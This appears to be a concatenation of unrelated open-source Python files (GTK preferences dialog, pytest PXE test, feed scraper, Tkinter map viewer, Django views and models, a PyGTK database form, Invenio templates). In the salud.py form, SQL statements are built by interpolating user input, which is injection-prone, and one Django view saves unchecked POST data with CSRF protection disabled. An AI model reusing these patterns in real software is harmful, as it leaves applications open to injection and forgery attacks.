l.set_markup(_('<b>Saving</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Default file format:'))
l.set_alignment(0.0, 0.5)
combo = self.defaultsaveformat_combo = gtk.combo_box_new_text()
self.defaultsaveformat_values = [filehandling.SAVE_FORMAT_ORA,
filehandling.SAVE_FORMAT_PNGSOLID, filehandling.SAVE_FORMAT_JPEG]
for saveformat in self.defaultsaveformat_values:
format_desc = self.app.filehandler.saveformats[saveformat][0]
combo.append_text(format_desc)
combo.connect('changed', self.defaultsaveformat_combo_changed_cb)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
table.attach(combo, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Save Next Scrap</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Path and filename prefix:'))
l.set_alignment(0.0, 0.5)
self.prefix_entry = gtk.Entry()
self.prefix_entry.connect('changed', self.prefix_entry_changed_cb)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
table.attach(self.prefix_entry, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
### View tab
table = gtk.Table(2, 4)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
nb.append_page(table, gtk.Label(_('View')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Default View</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Default zoom:'))
l.set_alignment(0.0, 0.5)
combo = self.defaultzoom_combo = gtk.combo_box_new_text()
# Different from doc.zoomlevel_values because we only want a subset
# - keep sorted for bisect
self.defaultzoom_values = [0.25, 0.50, 1.0, 2.0]
for val in self.defaultzoom_values:
combo.append_text('%d%%' % (val*100))
combo.connect('changed', self.defaultzoom_combo_changed_cb)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
table.attach(combo, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
b = self.highqualityzoom_checkbox = gtk.CheckButton(_('High quality zoom (may result in slow scrolling)'))
b.connect('toggled', self.highqualityzoom_checkbox_changed_cb)
table.attach(b, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
def on_response(self, dialog, response, *args):
if response == gtk.RESPONSE_ACCEPT:
self.app.save_settings()
self.hide()
elif response == RESPONSE_REVERT:
self.app.load_settings()
self.app.apply_settings()
def update_ui(self):
"""Update the preferences window to reflect the current settings."""
if self.in_update_ui:
return
self.in_update_ui = True
p = self.app.preferences
self.cv.points = p['input.global_pressure_mapping']
self.prefix_entry.set_text(p['saving.scrap_prefix'])
# Device mode
mode_config = p.get("input.device_mode", None)
mode_idx = i = 0
for mode_name, junk in device_modes:
if mode_config == mode_name:
mode_idx = i
break
i += 1
self.input_devices_combo.set_active(mode_idx)
zoom = p['view.default_zoom']
zoomlevel = min(bisect_left(self.defaultzoom_values, zoom),
len(self.defaultzoom_values) - 1)
self.defaultzoom_combo.set_active(zoomlevel)
self.highqualityzoom_checkbox.set_active(p['view.high_quality_zoom'])
saveformat_config = p['saving.default_format']
saveformat_idx = self.app.filehandler.config2saveformat[saveformat_config]
idx = self.defaultsaveformat_values.index(saveformat_idx)
# FIXME: ^^^^^^^^^ try/catch/default may be more tolerant & futureproof
self.defaultsaveformat_combo.set_active(idx)
# Mouse button
for pref_name, junk in mouse_button_prefs:
action_config = p.get(pref_name, None)
action_idx = i = 0
for action_name, junk in mouse_button_actions:
if action_config == action_name:
action_idx = i
break
i += 1
combobox = self.mouse_action_comboboxes[pref_name]
combobox.set_active(action_idx)
self.cv.queue_draw()
self.in_update_ui = False
# Callbacks for widgets that manipulate settings
def input_devices_combo_changed_cb(self, widget):
i = widget.get_property("active")
mode = device_modes[i][0]
self.app.preferences['input.device_mode'] = mode
self.app.apply_settings()
def mouse_button_action_changed(self, widget, pref_name):
i = widget.get_property("active")
action = mouse_button_actions[i][0]
self.app.preferences[pref_name] = action
self.app.apply_settings()
def pressure_curve_changed_cb(self, widget):
self.app.preferences['input.global_pressure_mapping'] = self.cv.points[:]
self.app.apply_settings()
def prefix_entry_changed_cb(self, widget):
self.app.preferences['saving.scrap_prefix'] = widget.get_text()
def defaultzoom_combo_changed_cb(self, widget):
zoomlevel = self.defaultzoom_combo.get_active()
zoom = self.defaultzoom_values[zoomlevel]
self.app.preferences['view.default_zoom'] = zoom
def highqualityzoom_checkbox_changed_cb(self, widget):
self.app.preferences['view.high_quality_zoom'] = bool(widget.get_active())
self.app.doc.tdw.queue_draw()
def defaultsaveformat_combo_changed_cb(self, widget):
idx = self.defaultsaveformat_combo.get_active()
saveformat = self.defaultsaveformat_values[idx]
# Reverse lookup
for key, val in self.app.filehandler.config2saveformat.iteritems():
if val == saveformat:
formatstr = key
self.app.preferences['saving.default_format'] = formatstr
|
benosteen/mypaint
|
gui/preferenceswindow.py
|
Python
|
gpl-2.0
| 13,712
|
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
from cfme.utils.conf import cfme_data
from cfme.common.provider import cleanup_vm
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.scvmm import SCVMMProvider
from cfme.infrastructure.pxe import get_pxe_server_from_config, get_template_from_config
from cfme.provisioning import do_vm_provisioning
from cfme.utils import testgen
pytestmark = [
pytest.mark.meta(server_roles="+automate +notifier"),
pytest.mark.usefixtures('uses_infra_providers'),
pytest.mark.tier(2)
]
def pytest_generate_tests(metafunc):
# Filter out providers without provisioning data or hosts defined
argnames, argvalues, idlist = testgen.providers_by_class(
metafunc, [InfraProvider],
required_fields=[
['provisioning', 'pxe_server'],
['provisioning', 'pxe_image'],
['provisioning', 'pxe_image_type'],
['provisioning', 'pxe_kickstart'],
['provisioning', 'pxe_template'],
['provisioning', 'datastore'],
['provisioning', 'host'],
['provisioning', 'pxe_root_password'],
['provisioning', 'vlan']
]
)
pargnames, pargvalues, pidlist = testgen.pxe_servers(metafunc)
argnames = argnames + ['pxe_server', 'pxe_cust_template']
pxe_server_names = [pval[0] for pval in pargvalues]
new_idlist = []
new_argvalues = []
for i, argvalue_tuple in enumerate(argvalues):
args = dict(zip(argnames, argvalue_tuple))
provider = args['provider']
if provider.one_of(SCVMMProvider):
continue
provisioning_data = provider.data['provisioning']
pxe_server_name = provisioning_data['pxe_server']
if pxe_server_name not in pxe_server_names:
continue
pxe_cust_template = provisioning_data['pxe_kickstart']
if pxe_cust_template not in cfme_data.get('customization_templates', {}).keys():
continue
argvalues[i].append(get_pxe_server_from_config(pxe_server_name))
argvalues[i].append(get_template_from_config(pxe_cust_template))
new_idlist.append(idlist[i])
new_argvalues.append(argvalues[i])
testgen.parametrize(metafunc, argnames, new_argvalues, ids=new_idlist, scope="module")
@pytest.fixture(scope="function")
def setup_pxe_servers_vm_prov(pxe_server, pxe_cust_template, provisioning):
if not pxe_server.exists():
pxe_server.create()
pxe_server.set_pxe_image_type(provisioning['pxe_image'], provisioning['pxe_image_type'])
if not pxe_cust_template.exists():
pxe_cust_template.create()
@pytest.fixture(scope="function")
def vm_name():
vm_name = 'test_pxe_prov_{}'.format(fauxfactory.gen_alphanumeric())
return vm_name
def test_pxe_provision_from_template(appliance, provider, vm_name, smtp_test, setup_provider,
request, setup_pxe_servers_vm_prov):
"""Tests provisioning via PXE
Metadata:
test_flag: pxe, provision
suite: infra_provisioning
"""
# generate_tests makes sure these have values
(
pxe_template, host, datastore,
pxe_server, pxe_image, pxe_kickstart,
pxe_root_password, pxe_image_type, pxe_vlan
) = map(
provider.data['provisioning'].get,
(
'pxe_template', 'host', 'datastore',
'pxe_server', 'pxe_image', 'pxe_kickstart',
'pxe_root_password', 'pxe_image_type', 'vlan'
)
)
request.addfinalizer(lambda: cleanup_vm(vm_name, provider))
provisioning_data = {
'catalog': {
'vm_name': vm_name,
'provision_type': 'PXE',
'pxe_server': pxe_server,
'pxe_image': {'name': pxe_image}},
'environment': {
'host_name': {'name': host},
'datastore_name': {'name': datastore}},
'customize': {
'custom_template': {'name': pxe_kickstart},
'root_password': pxe_root_password},
'network': {
'vlan': pxe_vlan}}
do_vm_provisioning(appliance, pxe_template, provider, vm_name, provisioning_data, request,
smtp_test, num_sec=2100)
|
okolisny/integration_tests
|
cfme/tests/infrastructure/test_pxe_provisioning.py
|
Python
|
gpl-2.0
| 4,265
|
#!/usr/bin/env python
import sys
import os
import re
import json
import getopt
from typing import List
import logging
import logging.config
from pathlib import Path
from feed_maker_util import IO, URL, header_str
from feed_maker import FeedMaker
logging.config.fileConfig(os.environ["FEED_MAKER_HOME_DIR"] + "/bin/logging.conf")
LOGGER = logging.getLogger()
def check_excluded_keyword(line_list: List[str]):
excluded_keyword_list = ["남장여자", "에로틱", "로맨스", "육아"]
for excluded_keyword in excluded_keyword_list:
for line in line_list:
if excluded_keyword in line:
return True
return False
def compose_description(item, link):
description = "<div>\n"
description += " <div>%s</div>\n" % item["title"]
description += " <div>%s</div>\n" % ", ".join(item["seoKeywords"])
description += " <div>%s</div>\n" % item["catchphraseTwoLines"]
description += " <div><a href='%s'>%s</a></div>\n" % (link, link)
description += " <div class='position: relative;'>\n"
description += " <div style='position: absolute; top: 150px; max-height: 600px; overflow: hidden;'><img src='%s'></div>\n" % (item["backgroundImage"] + ".webp")
description += " <div style='position: absolute; top: 150px;'><img src='%s'></div>\n" % (item["featuredCharacterImageA"] + ".png")
description += " </div>\n"
description += "</div>\n"
return description
def main():
link_prefix = "http://webtoon.kakao.com/content"
link = ""
title = ""
num_of_recent_feeds = 1000
feed_dir_path = Path(os.environ["FEED_MAKER_WORK_DIR"])
optlist, _ = getopt.getopt(sys.argv[1:], "n:f:")
for o, a in optlist:
if o == '-n':
num_of_recent_feeds = int(a)
elif o == "-f":
feed_dir_path = Path(a)
content = IO.read_stdin()
content = re.sub(r'(^(<\S[^>]*>)+|(<\S[^>]*>)+$)', '', content)
result_list = []
json_data = json.loads(content)
if "data" in json_data:
if "sections" in json_data["data"]:
for section in json_data["data"]["sections"]:
# section == weekday
if "cardGroups" in section:
for card_group in section["cardGroups"]:
if "cards" in card_group:
for card in card_group["cards"]:
if "content" in card:
item = card["content"]
if not item["adult"] and not check_excluded_keyword(item["seoKeywords"]):
link = "%s/%s/%s" % (link_prefix, item["seoId"], item["id"])
title = item["title"]
result_list.append((link, title))
# 특수한 처리 - extraction 단계를 여기서 수행
description = compose_description(item, link)
html_file_name = URL.get_short_md5_name(URL.get_url_path(link)) + ".html"
file_path = feed_dir_path / "html" / html_file_name
if os.path.isfile(file_path):
continue
with open(file_path, 'w', encoding="utf-8") as fp:
fp.write(header_str)
fp.write(description)
fp.write(FeedMaker.get_image_tag_str("https://terzeron.com", "kakaowebtoon.xml", link))
for (link, title) in result_list[:num_of_recent_feeds]:
print("%s\t%s" % (link, title))
if __name__ == "__main__":
sys.exit(main())
|
terzeron/FeedMakerApplications
|
kakao/kakaowebtoon/capture_item_link_title.py
|
Python
|
gpl-2.0
| 3,876
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import with_statement
import os
__author__ = 'Henrik Lindgren'
# See LICENSE file for license (GPL2)
from save_file_parser import StrandedSaveTool
import Tkinter as tk
import tkFileDialog
import logging as log
log.basicConfig(format='%(levelname)s %(asctime)s %(funcName)s(): %(message)s',
level=log.DEBUG)
class Application(tk.Frame):
"""
Skeleton taken from
http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/minimal-app.html
"""
SIZE_OF_ISLAND_DOT = 5
SIZE_OF_PLAYER_DOT = 5
COLOR_OF_ISLAND = 'blue'
COLOR_OF_SEA = 'white'
COLOR_OF_PLAYER = 'red'
def __init__(self, size=1024, title='World Viewer'):
tk.Frame.__init__(self)
width = size
height = size
self.master.minsize(width=width, height=height)
self.master.maxsize(width=width, height=height)
self.normalize_origo = size / 2
self.master.resizable(width=tk.FALSE, height=tk.FALSE)
self.master.title(title)
self.grid()
self.reload_button = tk.Button(self, text='Reload',
command=self.reload, state='disable')
self.reload_button.grid()
self.load_button = tk.Button(self, text='Load savefile',
command=self.load_file)
self.load_button.grid()
self.canvas = tk.Canvas(self, bg=Application.COLOR_OF_SEA, width=0, height=0)
self.canvas.grid()
self.filepath = None
self.player = None
self.world = None
# if you adjust scale_mod from .2 to .1,
# you need to raise adjust_mod from 2 to 4 and so on
self.scale_mod = .1
self.adjust_mod = 4
def _load_from_file(self, _file):
"""
Loads a world from a file to wherever we're drawing it.
:param _file:
"""
file_contents = ''.join(_file.readlines())
tool = StrandedSaveTool(file_contents)
self.player = tool.get_player()
self.world = tool.get_world_and_islands()
self.draw_world_and_player()
def _normalize_and_scale_coordinate(self, value, scale):
return (value + self.normalize_origo) / scale
def get_scale_x(self):
return (self.world.max_distance_x /
self.winfo_width()) * self.scale_mod
def get_scale_z(self):
return (self.world.max_distance_z /
self.winfo_height()) * self.scale_mod
def draw_world_and_player(self):
"""
Draws a map on the canvas.
"""
self.canvas.delete(tk.ALL)
self.canvas.config(width=self.master.winfo_width(),
height=self.master.winfo_width())
log.debug('canvas w:%s, h:%s',
self.master.winfo_width(), self.master.winfo_height())
scale_x = self.get_scale_x()
scale_z = self.get_scale_z()
x_adjust = self.master.winfo_width() * self.scale_mod * self.adjust_mod
z_adjust = self.master.winfo_height() * self.scale_mod * self.adjust_mod
if self.player and self.world:
for island in self.world.islands:
island_x = self._normalize_and_scale_coordinate(
island.position.x, scale_x) + x_adjust
island_z = self._normalize_and_scale_coordinate(
island.position.z, scale_z) + z_adjust
self.canvas.create_rectangle(
island_x, island_z,
island_x + Application.SIZE_OF_ISLAND_DOT,
island_z + Application.SIZE_OF_ISLAND_DOT,
fill=Application.COLOR_OF_ISLAND)
player_x = self._normalize_and_scale_coordinate(
self.player.position.x, scale_x) + x_adjust
player_z = self._normalize_and_scale_coordinate(
self.player.position.z, scale_z) + z_adjust
self.canvas.create_rectangle(
player_x, player_z,
player_x + Application.SIZE_OF_PLAYER_DOT,
player_z + Application.SIZE_OF_PLAYER_DOT,
fill=Application.COLOR_OF_PLAYER)
else:
log.warn("player? %s, world? %s",
self.player is not None, self.world is not None)
def reload(self):
"""
Updates the map from a file with the same path as the last file loaded.
"""
log.debug('Clicked reload!')
with open(self.filepath, 'r') as _file:
self._load_from_file(_file)
def load_file(self):
"""
Open a file manager to point at a Stranded Deep save file
See http://tkinter.unpythonic.net/wiki/tkFileDialog for docs
"""
log.debug('Clicked load!')
self.reload_button.configure(state='normal')
with tkFileDialog.askopenfile(mode='r') as _file:
self.filepath = os.path.abspath(_file.name)
self._load_from_file(_file)
if __name__ == '__main__':
app = Application()
app.mainloop()
|
henriklindgren/strandedsavetool
|
world_viewer.py
|
Python
|
gpl-2.0
| 5,069
|
#!/bin/python
# -*- coding: utf-8 -*-
# Author: Pavel Studenik
# Email: pstudeni@redhat.com
# Date: 24.9.2013
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework import viewsets
from apps.core.models import JobTemplate, Recipe, \
Task, Author, Arch, Distro, System, Test
from apps.waiver.models import Comment
from models import Performance
from filters import TaskFilter
from serializers import JobTemplateSerializer, RecipeSerializer, \
TaskSerializer, AuthorSerializer, ArchSerializer, \
DistroSerializer, SystemSerializer, \
CommentSerializer, TestSerializer
class RecipeViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Recipe.objects.all().select_related('job', 'arch', 'distro')
serializer_class = RecipeSerializer
ordering_fields = '__all__'
ordering = ('-uid',)
filter_fields = ('uid', )
http_method_names = ['get', 'head']
class AuthorViewSet(viewsets.ModelViewSet):
"""
API endpoint for Author.
"""
queryset = Author.objects.all()
serializer_class = AuthorSerializer
ordering_fields = '__all__'
ordering = ('-email',)
http_method_names = ['get', 'head']
class TaskViewSet(viewsets.ModelViewSet):
"""
API endpoint for Tasks. It is possible to use attribute 'results' for
filtering more then one result.
&results=3,4,5
"""
queryset = Task.objects.all().select_related('test')
serializer_class = TaskSerializer
filter_class = TaskFilter
ordering_fields = '__all__'
ordering = ('-uid',)
http_method_names = ['get', 'head']
class JobTemplateViewSet(viewsets.ModelViewSet):
queryset = JobTemplate.objects.all()
serializer_class = JobTemplateSerializer
ordering_fields = '__all__'
ordering = ('-id',)
filter_fields = ('uid', )
http_method_names = ['get', 'head']
class ArchViewSet(viewsets.ModelViewSet):
"""
API endpoint for Arch.
"""
queryset = Arch.objects.all()
serializer_class = ArchSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class DistroViewSet(viewsets.ModelViewSet):
"""
API endpoint for Distro.
"""
queryset = Distro.objects.all()
serializer_class = DistroSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class SystemViewSet(viewsets.ModelViewSet):
"""
API endpoint for System.
"""
queryset = System.objects.all()
serializer_class = SystemSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class CommentViewSet(viewsets.ModelViewSet):
"""
API endpoint for Comment.
"""
queryset = Comment.objects.all()
serializer_class = CommentSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
class TestViewSet(viewsets.ModelViewSet):
"""
API endpoint for Test.
"""
queryset = Test.objects.all()
serializer_class = TestSerializer
ordering_fields = '__all__'
ordering = ('-id',)
http_method_names = ['get', 'head']
@csrf_exempt
def performance(request):
perf = Performance(
label=request.POST.get("label"),
name=request.POST.get("name"),
description=request.POST.get("description"),
exitcode=request.POST.get("exitcode", -1),
duration=request.POST.get("duration")
)
perf.save()
data = "ok"
return HttpResponse(data, mimetype="application/json")
|
BlackSmith/GreenTea
|
apps/api/views.py
|
Python
|
gpl-2.0
| 3,641
|
# -*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, PermissionsMixin
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
class UserManager(BaseUserManager):
def create_user(self, user_id, name, password=None, **extra_fields):
"""
Creates and saves a User with the given email and password.
"""
now = timezone.now()
user = self.model(user_id = user_id, name = name,
is_staff=False, is_active=True, is_superuser=False,
last_login=now, date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, user_id, name, password, **extra_fields):
u = self.create_user(user_id, name, password, **extra_fields)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
class BookShareAbstractUser(AbstractBaseUser, PermissionsMixin):
user_id = models.CharField(_(u'학번'),
max_length=10,
help_text=_(u'학번'),
unique=True,
db_index=True)
name = models.CharField(_(u'이름'),
max_length=15,
help_text=_(u'이름'))
email = models.EmailField(_('Email'),
max_length=255,
unique=True)
is_staff = models.BooleanField(_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as'
'active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
phone_number = models.CharField(_(u'연락처'),
max_length=20)
objects = UserManager()
REQUIRED_FIELDS = ['name']
USERNAME_FIELD = 'user_id'
class Meta:
verbose_name = _(u'사용자')
verbose_name_plural = _(u'사용자')
abstract = True
def get_short_name(self):
return self.name
def get_full_name(self):
return self.name
def __unicode__(self):
return u"{} ({})".format(self.name, self.phone_number)
class User(BookShareAbstractUser):
class Meta:
verbose_name = _(u'서비스 유저')
verbose_name_plural = _(u'서비스 유저들')
swappable = 'AUTH_USER_MODEL'
points = models.IntegerField(default=0)
def ensure_points(self, points):
assert self.points >= points, "포인트가 부족합니다"
def get_points(self, points):
assert points > 0, "포인트는 0 이하로 떨어질 수 없습니다"
self.points += points
def lose_points(self, points):
assert points > 0, "포인트가 0 이하로 떨어질 수 없습니다"
self.ensure_points(points)
self.points -= points
|
SungJinYoo/BookShare
|
bookshare/apps/users/models.py
|
Python
|
gpl-2.0
| 3,448
|
#! /usr/bin/env python
import sys
import dendropy
def count_subtree_leaf_set_sizes(tree):
internal_nodes = tree.internal_nodes()
subtree_leaf_set_sizes = {}
for nd in internal_nodes:
leaf_count = 0
for leaf in nd.leaf_iter():
leaf_count += 1
if nd.taxon is not None:
label = nd.taxon.label
else:
label = nd.label
subtree_leaf_set_sizes[label] = leaf_count
return subtree_leaf_set_sizes
trees = dendropy.TreeList.get_from_path(sys.argv[1], sys.argv[2])
for tidx, tree in enumerate(trees):
subtree_leaf_set_sizes = count_subtree_leaf_set_sizes(tree)
keys = sorted(subtree_leaf_set_sizes.keys())
for key in keys:
sys.stdout.write("{}\t{}\t{}\n".format(tidx, key, subtree_leaf_set_sizes[key]))
|
jeetsukumaran/pstrudel
|
test/scripts/calc-subtree-leaf-set-sizes.py
|
Python
|
gpl-2.0
| 805
|
#!/usr/bin/env python
############################################################################
# Copyright (C) 2005 by #
# #
# Milton Inostroza Aguilera #
# minoztro@gmail.com #
# #
# This class is free software; you can redistribute it and#or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# This class is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the #
# Free Software Foundation, Inc., #
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #
############################################################################
from GladeConnect import GladeConnect
import gobject
from pyPgSQL.PgSQL import connect
from gtk import TRUE, FALSE
import pygtk
pygtk.require('2.0')
import gtk
import sys
from dialogo_error import DialogoError
from types import StringType
class Salud(GladeConnect):
"Crea, Modifica, Actualiza sistema de salud FONOSA o ISAPRES"
def __init__(self,cursor):
GladeConnect.__init__(self, "glade/salud.glade")
self.cursor=cursor
self.ventana_activa = None
self.padre = None
#poniendo no editable a las cajas
self.entryNombre.set_sensitive(False)
self.entryRazonSocial.set_sensitive(False)
#poniendo no disponibles a los botones que corresponden
self.toolbuttonNuevo.set_sensitive(True)
self.toolbuttonAnadir.set_sensitive(False)
self.toolbuttonActualizar.set_sensitive(False)
self.toolbuttonQuitar.set_sensitive(False)
#pone el foco en codigo
self.entryNombre.grab_focus()
#metodo para treeview
self.define_vista()
self.crea_modelo()
def define_vista(self):
lbl = unicode('Nombre')
column = gtk.TreeViewColumn(lbl.encode('utf-8'), gtk.CellRendererText(), text=0)
self.treeviewSalud.append_column(column)
lbl = unicode('Razon Social')
column = gtk.TreeViewColumn(lbl.encode('utf-8'), gtk.CellRendererText(), text=1)
self.treeviewSalud.append_column(column)
def crea_modelo(self):
self.modelo = gtk.ListStore(str, str)
self.treeviewSalud.set_model(self.modelo)
def lista_datos(self):
self.modelo.clear()
sql ="""
SELECT nombre_salud, razon_social_salud
FROM salud
ORDER BY nombre_salud
"""
self.cursor.execute(sql)
r=self.cursor.fetchall()
for i in r:
self.modelo.append(i)
return
def on_treeviewSalud_row_activated(self, tree, row, column):
sql ="""
SELECT *
FROM salud WHERE nombre_salud='%s'
ORDER BY nombre_salud
"""%(self.modelo[row][0])
self.cursor.execute(sql)
r=self.cursor.fetchall()
self.pk_salud=r[0][0]
self.entryNombre.set_text(r[0][0])
self.entryRazonSocial.set_text(r[0][1])
#poniendo no disponibles a los botones que corresponden
self.toolbuttonNuevo.set_sensitive(False)
self.toolbuttonAnadir.set_sensitive(False)
self.toolbuttonActualizar.set_sensitive(True)
self.toolbuttonQuitar.set_sensitive(True)
#poniendo editable a las cajas
self.entryNombre.set_sensitive(True)
self.entryRazonSocial.set_sensitive(True)
#foco en codigo
self.entryNombre.grab_focus()
def on_toolbuttonNuevo_clicked(self, toolbuttonNuevo=None):
#Poniendo editable a las cajas
self.entryNombre.set_sensitive(True)
self.entryRazonSocial.set_sensitive(True)
#BORRA EL CONTENIDO DE LAS CAJAS DE TEXTO
self.entryNombre.set_text("")
self.entryRazonSocial.set_text("")
#Deja sensible a anadir
self.toolbuttonNuevo.set_sensitive(False)
self.toolbuttonAnadir.set_sensitive(True)
self.toolbuttonActualizar.set_sensitive(False)
self.toolbuttonQuitar.set_sensitive(False)
#foco en codigo
self.entryNombre.grab_focus()
def on_toolbuttonAnadir_clicked(self, toolbuttonAnadir=None):
if self.entryNombre.get_text() == "":
self.on_toolbuttonNuevo_clicked()
return
try:
sql ="""
INSERT INTO salud
VALUES ('%s','%s')
"""%(
self.entryNombre.get_text().upper(),
self.entryRazonSocial.get_text().upper()
)
self.cursor.execute(sql)
self.padre.cnx.commit()
self.lista_datos()
self.on_toolbuttonNuevo_clicked()
except:
string = StringType(sys.exc_info()[1])
string = unicode(string,"iso8859-15")
string = string.encode("utf-8")
dialogo_error=DialogoError(string)
dialogo_error.dialog1.show_all()
dialogo_error.padre=self.padre
self.padre.vbox1.set_sensitive(False)
return
return
def on_toolbuttonActualizar_clicked(self, toolbuttonActualizarIsapre=None):
if self.entryNombre.get_text()=="":
return
try:
sql ="""
UPDATE salud
SET
nombre_salud='%s',razon_social_salud='%s'
WHERE nombre_salud='%s'
"""%(
self.entryNombre.get_text().upper(),
self.entryRazonSocial.get_text().upper(),
self.pk_salud.upper()
)
self.cursor.execute(sql)
self.padre.cnx.commit()
self.lista_datos()
self.on_toolbuttonNuevo_clicked()
except:
string = StringType(sys.exc_info()[1])
string = unicode(string,"iso8859-15")
string = string.encode("utf-8")
dialogo_error=DialogoError(string)
dialogo_error.dialog1.show_all()
dialogo_error.padre=self.padre
self.padre.vbox1.set_sensitive(False)
return
return
def on_toolbuttonQuitar_clicked(self, toolbuttonQuitarIsapre=None):
try:
sql ="""
DELETE FROM salud
WHERE nombre_salud='%s'
"""%(self.pk_salud.upper())
self.cursor.execute(sql)
self.padre.cnx.commit()
self.lista_datos()
self.on_toolbuttonNuevo_clicked()
except:
string = StringType(sys.exc_info()[1])
string = unicode(string,"iso8859-15")
string = string.encode("utf-8")
dialogo_error=DialogoError(string)
dialogo_error.dialog1.show_all()
dialogo_error.padre=self.padre
self.padre.vbox1.set_sensitive(False)
return
return
|
minostro/remunex
|
src/salud.py
|
Python
|
gpl-2.0
| 6,709
|
# -*- coding: utf-8 -*-
## Comments and reviews for records.
## This file is part of Invenio.
## Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""HTML Templates for commenting features """
__revision__ = "$Id$"
import cgi
# Invenio imports
from invenio.urlutils import create_html_link
from invenio.webuser import get_user_info, collect_user_info, isGuestUser, get_email
from invenio.dateutils import convert_datetext_to_dategui
from invenio.webmessage_mailutils import email_quoted_txt2html
from invenio.webcomment_config import \
CFG_WEBCOMMENT_MAX_ATTACHED_FILES, \
CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE
from invenio.config import CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_SITE_NAME_INTL,\
CFG_SITE_SUPPORT_EMAIL,\
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBCOMMENT_ALLOW_COMMENTS, \
CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR, \
CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN, \
CFG_WEBCOMMENT_AUTHOR_DELETE_COMMENT_OPTION, \
CFG_CERN_SITE
from invenio.htmlutils import get_html_text_editor
from invenio.messages import gettext_set_language
from invenio.bibformat import format_record
from invenio.access_control_engine import acc_authorize_action
from invenio.websearch_templates import get_fieldvalues
class Template:
"""templating class, refer to webcomment.py for examples of call"""
def tmpl_get_first_comments_without_ranking(self, recID, ln, comments, nb_comments_total, warnings):
"""
@param recID: record id
@param ln: language
@param comments: tuple as returned from webcomment.py/query_retrieve_comments_or_remarks
@param nb_comments_total: total number of comments for this record
@param warnings: list of warning tuples (warning_msg, arg1, arg2, ...)
@return: html of comments
"""
# load the right message language
_ = gettext_set_language(ln)
# naming data fields of comments
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_id = 4
warnings = self.tmpl_warnings(warnings, ln)
# comments
comment_rows = ''
max_comment_round_name = comments[-1][0]
for comment_round_name, comments_list in comments:
comment_rows += '<div id="cmtRound%i" class="cmtRound">' % (comment_round_name)
comment_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name} + "<br/>"
for comment in comments_list:
if comment[c_nickname]:
nickname = comment[c_nickname]
display = nickname
else:
(uid, nickname, display) = get_user_info(comment[c_user_id])
messaging_link = self.create_messaging_link(nickname, display, ln)
comment_rows += """
<tr>
<td>"""
report_link = '%s/record/%s/comments/report?ln=%s&comid=%s' % (CFG_SITE_URL, recID, ln, comment[c_id])
reply_link = '%s/record/%s/comments/add?ln=%s&comid=%s&action=REPLY' % (CFG_SITE_URL, recID, ln, comment[c_id])
comment_rows += self.tmpl_get_comment_without_ranking(req=None, ln=ln, nickname=messaging_link, comment_uid=comment[c_user_id],
date_creation=comment[c_date_creation],
